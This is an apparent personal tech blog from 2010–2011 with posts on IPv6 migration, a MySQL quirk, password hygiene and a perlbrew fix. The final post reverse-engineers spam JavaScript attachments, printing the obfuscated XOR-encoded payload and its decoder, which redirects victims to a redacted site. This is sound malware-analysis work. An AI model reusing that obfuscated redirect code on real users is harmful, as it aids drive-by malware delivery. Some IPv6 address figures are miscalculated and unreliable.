Thursday, March 17, 2011

"IPv6 no cause for alarm" - Melvyn Wray, 2011

My response to this article by idiot Melvyn Wray.

 

 

I hope you aren't paid to write for this website.  If so, you need to be fired immediately.

2000 wasn't a meltdown because corporations the world over spent BILLIONS on their software and infrastructure.  The company for which I was working at the time started hiring contract programmers in 1994 and still crossed their fingers hoping it would be enough time to audit and rewrite millions of lines of code.

My current company has allocated around $10 million dollars in infrastructure over the next couple of years.  As an ISP, you'd think we'd be able to find SOMEONE with a turnkey solution to give us a smooth ipv6 migration path.  Instead, despite the imminence of ipv6, we're starting to feel like pioneers in the industry, a position that we do not desire in the least.  For example, there are currently NO vendors offering a full-featured large scale nat solution to buy us some time to get fully underway with ipv6.  When you ask any of them about PCP, you're met with blank stares or "why would anyone want to do that?"  Granted, the initial draft of the IETF document was written only a month or so ago, ( https://datatracker.ietf.org/doc/draft-ietf-pcp-base/ ) but it should not be the burden of us as the customer to explain why this is critical to a vendor who is boasting that they have the best LSN solution.

The burden is on us to come up with a solution that allows our customers to access both ipv6 addresses as well as ipv4 addresses for at least the next decade.  I'd ask you to think of the ramifications of that task, but you're not capable.  Suffice it to say, for the forseeable future, access to both ipv4 and ipv6 is mission critical.

Every single piece of hardware serving customers is affected.  Every cable modem earlier than docsis 3.0 needs to eventually be replaced. Every cable tv set top box will eventually need to be replaced.  Not only does the cable modem need to be replaced, we're discussing the very real possibility of having to put a nat/fw at each customer premises.  The reason for this?  If, today, you walk into your local Staples, Best Buy, Dixon's, or Curry's, *almost none* of their devices are fully ipv6 capable.  Are you the one who is willing to tell the customer that, sure, your Roku, Tivo, Slingbox, Kindle, iPod, wifi Galaxy Tab, Xbox, Wii, Airport Extreme, and Magic Jack will all definitely work with ipv6?  You'd bet your paycheck on it?

Every one of our servers needs some attention because even the most recent 5.x version, Red Hat Enterprise and their glorious patch hostage business model is *STILL* based on linux kernel 2.6.18, which has some ipv6 related weaknesses.  Every piece of software that serves our customers needs at least some rewriting, especially with regards to anti-spam.  There is very little in the way of good, solid support for ipv6 blacklists.  The author of rbldnsd, for example, just committed some early support for ipv6 in his code a little over a week ago.  It's just enough to get us some working blacklist functionality.

Many of the most expensive pieces of our core networking infrastructure needs to be replaced.  While Cisco may have stamped "ipv6 ready" on the side of much of their gear, the act of turning on ipv6 support nearly brings the box to its knees.  The reason is because instead of having each line card being capable of hardware flows that require very little interaction with the supervisor engine, ipv6 is implemented in software-only, so suddenly every single packet needs to be sent to the supervisor card for handling.  This alone may cost us millions.  We're by no means a Cisco-only shop, so we're hoping that our testing doesn't reveal too many more surprises like this.

And you've obviously been reading nothing but puff pieces regarding ipv6 and security.  While it has a small number of nice features, it offers not one single bit of increased security that should cause ANYONE to breathe easier.  If anything, it should stress people out even more.  We're going to be finding fundamental flaws in the handling of ipv6 for years to come.  As recently as a couple of years ago, I discovered a critical flaw with the version of glibc that openSUSE was using at the time and it's handling of AF_INET, AF_INET6, and AF_UNSPEC.  It was easily missed because this flaw only surfaced when interacting with oddly behaving DNS servers and so only affected, at best, 1% of their userbase.  To my knowledge, no one ever figured out the entire cause in any sort of forensic detail, and was eventually fixed. 

This also glosses over a very serious shortcoming in ipv6 to which none of the original designers are willing to admit.  The problem is that ipv6 was designed in the early to mid 90's, when nat didn't even exist.  While the designers lauded themselves for guaranteeing that everything could have a public, internet facing ip address, they forgot to take into consideration whether or not everything *should* have a public, internet facing ip address.  Do you think the hacker's at the recent Pwn2Own conference were balked in any way by ipv6?  Do you think the recent, critical icon vulnerability in Windows is in any way stopped by ipv6?  Does the display of a favicon.ico file that exploits this vulnerability somehow become subverted because it was loaded from an ipv6 website?  Using nat provides a fundamental level of security that truly makes the internet a safer place.  Insisting, even despite proof to the contrary, that every device should be accessible via the internet is just plain wrong, no matter how many phd's can't get their own heads out of their asses.

All you're aware of is the little bit of a golf ball sized chunk of ice that you've been able to perceive.  The reality of the iceberg underneath is absolutely cause for alarm.  Keep your finger pointing and chicken little accusations to yourself and let the big boys who do the real work take care of business.

Here's to your writing success in a field other than technology.

#EPIC #FAIL

Posted by at No comments:
Labels: ,

Monday, March 14, 2011

Anyone used mysql with 128-bit binary strings? Riddle me this...

I was doing a little experimentation wielding ipv6 with perl and mysql:

So, given this table schema:

 

 

mysql> desc binary_i;

+-------+------------------+------+-----+---------+----------------+

| Field | Type             | Null | Key | Default | Extra          |

+-------+------------------+------+-----+---------+----------------+

| id    | int(10) unsigned | NO   | PRI | NULL    | auto_increment |

| ip    | binary(255)      | NO   |     | NULL    |                |

| mask  | binary(255)      | NO   |     | NULL    |                |

+-------+------------------+------+-----+---------+----------------+

3 rows in set (0.00 sec)

 

 

 

 

Can anyone explain this??

 

Show a row:

 

mysql> select * from binary_i limit 1\G

*************************** 1. row ***************************

  id: 1

  ip: 00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101

mask: 11111111111111111111111111111111111111111111111111111111111111110000000000000000000000000000000000000000000000000000000000000000

1 row in set (0.00 sec)

 

 

 

 

Copy the ip value from that into a select statement:

 

 

mysql> select * from binary_i where ip = '00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101';

Empty set (0.01 sec)

 

 

 

Empty??

Try again with double quotes:

 

mysql> select * from binary_i where ip = "00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101";

Empty set (0.01 sec)

 

 

Still Empty??

Try it as a like statement with preceding and succeeding % symbols:

 

mysql> select * from binary_i where ip like '100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101%' limit 1;

+----+----------------------------------------------------------------------------------------------------------------------------------------

| id | ip

+----+----------------------------------------------------------------------------------------------------------------------------------------

|  1 | 00100110000001101111010000000000000010000000000100100000000000000000000101110010000000000010010000000000000000010000000001010101

+----+----------------------------------------------------------------------------------------------------------------------------------------

1 row in set (0.00 sec)

 

 

 

Success.  Using the same string as I did in the previous WHERE clauses. I'd be a lot less baffled if I weren't COPY and PASTING the binary string directly from an existing entry in the db.

Posted by at No comments:
Labels: ,

Sunday, January 16, 2011

Microsoft Math #FAIL


$319.99 - $299.99 = $129.95????

Posted by at No comments:
Labels: ,

Monday, December 13, 2010

Today has been one of those days...

It's been one of those days where it just feels as if there's been...  a disturbance in the force.  Not the extinguishing of millions of outcrying voices, more the subtle murmur of apology from the pickpocket who just accidentally bumped into you.

It started this morning.  My BlackBerry notifies me that it can no longer access my gmail account.  I log in from my laptop and it claims there has been suspicous activity with my account and I must enter my cell phone number to proceed with account revalidation.  I do, change my password, and successfully access my gmail account.  I hit the page where Google logs ip addresses used for accessing my gmail account and see nothing untoward.  My laptop from home and work, my BlackBerry, and nothing more.  When my wife's gmail account was hacked last month, it clearly showed an ip address from China, so the event was fresh in my mind and I knew exactly what the suspicious activity would look like.  (Unfortunate that Google didn't disable her account in a similar fashion to how mine was disabled before her account was used to send messages to her entire addressbook containing a malicious link.)  Presumably, Google has just today tightened security up a bit more. Since my BlackBerry uses BIS to hit gmail, it appears as if the connection is coming from a Canadian ip address, thousands of miles from my current location.  This seems the likely culprit of the suspicious activity.  I was due for a password change anyway and LastPass generates beautiful ones.  No harm, no foul.

Next, a message from my wife.  She asks about a small charge appearing on our account from a bookstore in Colorado.  Mental red flag is on its way back up even before it's come all the way back down from the last incident.  Start investigating, turns out it was just a book my wife ordered through the local school book fair, which is operated by a company in CO.  No harm, no foul.

Enter Twitter.  LastPass, which normally does a fine job of handling Twitter logins automatically, balks.  Invalid password.  W. T. F.  The red flag goes up like it was tied to the camel of a radical middle eastern zealot running late for a good stoning.  I log in and start analyzing my account for wrongdoing.  I notice the password it attempted to use was the wrong one.  My wonton use of LastPass anywhere and everywhere across all my operating systems, (Linux, Win7, WinXP, BlackBerry) and all the browsers I use regularly, (Chrome dev, Chrome canary, Firefox 4, Safari, Opera 10, Opera 11, occasionally IE9), caused a little bit of a sync problem when last I changed my twitter password.  No harm no foul.

Just for the sake of giving my red flag a rest, I went and changed several of my important passwords and wanted to take the time to encourage you to do the same.  Lifehacker has posted this handy guide in response to the Gawker hack that occurred recently.  Take a moment to read through it and give your passwords and accounts a good once-over.  Lifehacker: How to Audit and Update Your Passwords

Posted by at No comments:

Friday, October 29, 2010

Quick tip for openSUSE users of App::perlbrew...

Ever since I installed 11.2 on my ultra40 a few months ago, perlbrew has been busted for me.  After failing, the build log always ended with:

ODBM_File.xs:124: error: too few arguments to function ‘dbmclose’

I finally took the trouble to fix it.  After some googling, I saw that others on opensuse had seen this while compiling on their own, but didn't readily see any search results for how to easily fix it with an automated builder like perlbrew.  Turns out the secret sauce isn't that difficult since perlbrew with happily pass through any perl building arguments:

perlbrew install perl-5.12.2 -D noextensions=ODBM_File

Posted by at No comments:
Labels: ,

Monday, September 27, 2010

Teh maths is fun... (ipv6 rant)

My company just got it's ipv6 allocation.  They gave us a /32.  Let's walk through this math for those of you watching from home.

/32 is the number of bits.  The full length of an ipv6 address is 128 bits.  Represented in binary, this means that the highest possible number is all 1's, for a total of 128 of them:

 

11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111

 

To convert this number into decimal, you start way over at the right, and continuously increment by the powers of 2.  The first position is 1, the second is 2, the third is four, the fifth is 8, the sixth is 16, the seventh is 32, and so on and so forth.  If you bother to follow those powers of two all the way out to 128 bits, you end up with a really big number.  170,141,183,460,469,000,000,000,000,000,000,000,000 to be exact.  This is the maximum number of ip addresses able to be assigned out of the ipv6 pool.

Our allocation of a /32 means that, starting from the left, you count out 32 binary bit positions and flip them to a 1, and the remaining 96 binary positions are all 0.  This gives us a total allocation of 79,228,162,514,264,300,000,000,000,000 ip address.  If you were to write me a check giving me a dollar for every one of our ip addresses, you'd need a check that was about 3 feet wide so that you could write out the number in english.  You'd be writing me a check for seventy-nine octillion, two hundred twenty-eight septillion, one hundred sixty-two sextillion, five hundred fourteen quintillion, two hundred sixty-four quadrillion, three hundred trillion dollars.

So, my company has personally been given enough ipv6 addresses to assign every single cell in your body well over 1 quadrillion ip addresses.  Every. Single. Cell.

From what I've been hearing, this is the norm.  They gave one guy a /48 for his websites, of which he has a small handful.  One septillion ip addresses.  For a few websites.

Let's extrapolate that our /32 is the norm for anyone needing more than a handful of ip addresses.  Divide the biggest possible 128 bit number by our /32 allocation.

 

170,141,183,460,469,000,000,000,000,000,000,000,000
÷ 79,228,162,514,264,300,000,000,000,000

2,147,483,648

 

That's the kind of number you don't need any help spelling out.  A little better than 2 billion.  How many ipv4 addresses are there?  Double that.  4 billion, though the way ipv4 has been carved up means that substantially less than that is usable.

It took us 30 years to approach exhaustion of the ipv4 space, though the last 15 years has seen such an exponential increase, the first 15 years is nothing but a drop in a bit-bucket in comparison.

I've argued repeatedly that there's so much ipv4 space that is absolutely WASTED that there really isn't that much of a crunch if they started enforcing utilization standards.  MIT, for example, has 16 million public ipv4 addresses of their very own.  Why?  Because, when it was allocated to them so many years ago, they could get away with it.  16 million.  For a college.  Do they need 16 million publicly facing ip addresses?  NO.

And, of course, there's no place like 127.0.0.1 is there?  Another 16 MILLION ip addresses wasted on localhost.  Why?  Because back when it was assigned, they could.  Who cares, right?  When there's 4 billion addresses, what's 16 million here or there, just between friends?

Xerox, 16 million.  HP, 16 million.  Ford, 16 million.  Halliburton, 16 million.  Prudential, 16 million.  Merck, 16 million.

Do any of these companies need 16 million publicly facing ipv4 addresses?   NO.  That's over 83 million ip addresses wasted right there.  Yes, HP recently purchased a company that produced cell phones.  Do those cell phones need PUBLIC ipv4 addresses?  NO.  The specifics of the wastefulness of the ipv4 space are a separate rant, though.

My point is that this pattern of wastefulness is not only continuing with ipv6, it's getting much, much WORSE.  Insanely sized allocations to anyone who asks for a few ips?  Really?  What good is having this seemingly vast amount of address space, if (going back to the handful of websites example) the wastefulness of this space increases by not 1 or 2 or 10, but TWENTY-FIVE orders of magnitude?

The view from this boat looks a lot like it did 30 years ago.

Posted by at No comments:
Labels: ,

Friday, September 24, 2010

More weaponized javascript email attachments reverse engineered...

My reverse engineering of the latest rash of spam attachment scripts:

 

 

 

use strict; 
use warnings;                                                                                                                                                                         

use URI::Escape;


my $js =  '%66%75%6E%63%74%69%6F%6E%20%65%5F%65%28%65%29%7B%65%3D%75%6E%65%73%63%61%70%65%28%65%29%3B%70%3D%22%54%4F%45%4D%50%4A%5A%4D%4C%4B%50%51%42%4E%42%22%3B%73%3D%22%22%3B%73%6C%3D%6E%65%77%20%41%72%72%61%79%28%29%2C%6B%3D%30%2C%6A%3D%30%3B%66%6F%72%28%69%3D%30%3B%69%3C%65%2E%6C%65%6E%67%74%68%3B%69%2B%2B%29%7B%63%3D%65%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%3B%69%66%28%63%3C%31%32%38%29%7B%63%3D%63%5E%70%2E%63%68%61%72%43%6F%64%65%41%74%28%6A%25%70%2E%6C%65%6E%67%74%68%29%3B%6A%2B%2B%3B%7D%73%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%63%29%3B%69%66%28%73%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%73%6C%5B%6B%2B%2B%5D%3D%73%3B%73%3D%22%22%7D%7D%73%3D%73%6C%2E%6A%6F%69%6E%28%22%22%29%2B%73%3B%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%73%29%7D';


print uri_unescape( $js );
print "\n";

# the $js string is a function named e_e: 
#    function e_e(e){e=unescape(e);p="TOEMPJZMLKPQBNB";
#    s="";sl=new Array(),k=0,j=0;for(i=0;i80){sl[k++]=s;s=""}}s=sl.join("")+s;document.write(s)}

# My bad perl reproduction...
#
sub e_e {

    my $string = shift;
    my $e = uri_unescape($string);

    my $p = "TOEMPJZMLKPQBNB";

    my $s = "";

    my @sl;
    my $k = 0;
    my $j = 0;

    my @split = split( //, $e );
    my @psplit = split( //, $p );

    for( my $i = 0; $i < length( $e ); $i++ ){

        my $c = ord($split[$i]);

        if ( $c < 128 ) {
            my $result = $psplit[$j % length($p)];
            $c = $c ^ ord( $result );
            $j++;
        }

        $s .= chr($c);

        if( length($s) > 80 ) {
            $sl[$k++] = $s;
            $s = "";
        }
    }

    #s = sl.join("")+s;
    $s .= join( '', @sl );

    print $s;
    print "\n";

}

#This string is passed to the e_e:
e_e('ts%28%28%24%2Bz%258? |%27?7%3D9xo%22%2F%3C?%2988sb%2D%2D%3A%3B #%24wx%7Dw%3E%22%3D%7F&6 ?%7Fb%7F%3E2%28*9?%3C#%27%2C1%3Dk%2E?%27u|b#%24%3C%2Elb%7Bqem%5D@WGp?13%2E%2Bb#&!98wx||%7Busb%2C%2D&%2B ?mhjorw%24#b%2C%257 %29%22%22wxny~fgzv%60t%2E%29%247%24go%2F%2E%3E%25%27%3C%60js1%29nv%3Bm%24957%7Fl* %3B5w%7Fe%2D%3A%3Be %24%2E%221%3B%291c3%257b%24?%3D%3D2!51%3Dk%25%24%27xsp%2D??6n%245%2C pr^K%28%24%2D%27|q%0A%2B%2E%22*1%243%2Bvm?*%3E%22o%3D%27&&#op%295!#9msa^H^D^R                                                        ^C^Krj%29%246%2Emso%7F%60j^[%2D%24#j%0D%28%2Ek0%25%2Bb#%2E6m 859%29%28%244&n %2Do%0D^Y^]^F%0A%22%3B%2E%22%7Dbn^A8&&&p%22??%29k%24%3Eb^\%273&6958fb*                        %24%3E%25|rm5qyb%24%2Edqc?%22o~a65%2D%29%28nGP');

# produces a metarefresh to http://XXXXthefromainerXXXX.com
Posted by at No comments:
Labels: ,
Subscribe to: Posts (Atom)